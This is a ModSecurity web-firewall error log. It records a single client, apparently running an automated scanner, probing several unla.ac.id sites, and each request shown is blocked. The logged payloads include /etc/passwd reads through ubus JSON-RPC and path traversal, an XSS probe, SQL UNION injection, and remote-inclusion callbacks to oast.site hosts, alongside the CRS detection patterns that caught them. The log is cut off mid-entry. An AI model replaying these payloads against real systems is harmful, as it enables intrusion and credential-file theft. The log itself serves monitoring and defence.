[Tue Aug 29 11:44:23.571435 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfiYnUAAAAg"]
[Tue Aug 29 11:44:23.580136 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdOea0AAAAS"]
[Tue Aug 29 11:44:23.581233 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfloS0AAAAj"]
[Tue Aug 29 11:44:24.431709 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13qMCo-f0AAAfg7xsAAAAe"]
[Tue Aug 29 11:44:26.363180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfWN2wAAAAL"]
[Tue Aug 29 11:44:26.402827 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfSWbYAAAAB"]
[Tue Aug 29 11:44:26.415706 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAgzyOMAAAAF"]
[Tue Aug 29 11:44:26.419268 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAdOebcAAAAS"]
[Tue Aug 29 11:44:26.421595 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfg7x8AAAAe"]
[Tue Aug 29 11:44:27.375207 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfZj40AAAAN"]
[Tue Aug 29 11:44:27.377241 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfVkacAAAAD"]
[Tue Aug 29 11:44:27.387796 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfAOccAAAAH"]
[Tue Aug 29 11:44:27.387843 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAe3@CgAAAAA"]
[Tue Aug 29 11:44:27.395422 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfGadAAAAAT"]
[Tue Aug 29 11:44:27.412108 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13q8Co-f0AAAfAOcgAAAAH"]
[Tue Aug 29 11:44:28.397643 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13rMCo-f0AAAfZj5IAAAAN"]
[Tue Aug 29 11:44:29.431877 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfSWcAAAAAB"]
[Tue Aug 29 11:44:29.432235 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfZj5YAAAAN"]
[Tue Aug 29 11:44:29.441366 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfGadwAAAAT"]
[Tue Aug 29 11:44:29.459841 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAe3@DAAAAAA"]
[Tue Aug 29 11:44:29.467237 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfWN3wAAAAL"]
[Tue Aug 29 11:44:30.905559 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13rsCo-f0AAAg4DX8AAAAI"]
[Tue Aug 29 11:44:32.358639 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVF8AAAAf"]
[Tue Aug 29 11:44:32.415018 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVGAAAAAf"]
[Tue Aug 29 11:44:32.440564 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVGEAAAAf"]
[Tue Aug 29 11:44:32.441845 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAfkzBYAAAAi"]
[Tue Aug 29 11:44:32.455925 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAenGhcAAAAM"]
[Tue Aug 29 11:44:33.416339 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13scCo-f0AAAfg7zIAAAAe"]
[Tue Aug 29 11:44:35.392182 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gi7rbnas95kw61.oast.site found within TX:1: cjmnbitjmimt14dgn26gi7rbnas95kw61.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAg@-@wAAAAQ"]
[Tue Aug 29 11:44:35.399405 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gtrpq7d8kmiceg.oast.site found within TX:1: cjmnbitjmimt14dgn26gtrpq7d8kmiceg.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfVkb8AAAAD"]
[Tue Aug 29 11:44:35.414691 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname 